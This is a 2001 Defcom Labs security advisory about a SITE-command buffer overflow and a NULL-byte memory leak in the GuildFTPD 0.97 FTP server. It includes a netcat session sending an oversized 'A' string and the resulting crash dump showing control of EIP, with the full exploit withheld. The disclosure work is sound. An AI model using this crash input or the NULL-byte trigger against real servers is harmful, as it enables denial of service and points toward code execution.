From: andreas junestam (andreas.junestam@defcom.com)
Date: Sun May 27 2001 - 15:37:06 CDT


    ======================================================================
                      Defcom Labs Advisory def-2001-27

                   GuildFTPD Buffer Overflow and Memory Leak DoS

    Author: Andreas Junestam <andreas@defcom.com>
    Co-Author: Janne Sarendal <janne@defcom.com>
    Release Date: 2001-05-22
    ======================================================================
    ------------------------=[Brief Description]=-------------------------
    GuildFTPD contains two different problems:
    1. Buffer overrun in the SITE command with the ability to execute
       arbitrary code
    2. A memory leak in the input parsing code

    ------------------------=[Affected Systems]=--------------------------
    - GuildFtpd v0.97 (probably earlier versions too)

    ----------------------=[Detailed Description]=------------------------
    * SITE command Buffer Overflow
      All the SITE commands are handled in a DLL (sitecmd.dll) which suffers
      from a buffer overflow. By sending a SITE command greater than 261
      bytes, a buffer will overflow and it is possible to execute
      arbitrary code. We have chosen not to include the working exploit.

      C:\>nc 127.0.0.1 21
      220-GuildFTPD FTP Server (c) 1999,2000
      220-Version 0.97
      220 Please enter your name:
      user a
      331 User name okay, Need password.
      pass a
      230 User logged in.
      site AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

      Access violation - code c0000005 (first chance)
      eax=01450000 ebx=00000001 ecx=00000000 edx=00130608 esi=10030000 edi=009ed9e0
      eip=41414141 esp=01bcf9b4 ebp=10030000 iopl=0 nv up ei pl nz na po nc
      cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206

    * Memory Leak DoS
      The input parsing code in GuildFTPD contains a memory leak that is
      triggered by any request containing a NULL (0x00) character.
      GuildFTPD will still answer new requests, but eventually the server
      will run out of memory and the machine will crash.

    ---------------------------=[Workaround]=-----------------------------
    None for the moment

    -------------------------=[Vendor Response]=--------------------------
    This issue was brought to the developer's attention on the 24th of
    April, 2001; no response so far.

    ======================================================================
                This release was brought to you by Defcom Labs UK

                  labs@defcom.com www.defcom.com
    ======================================================================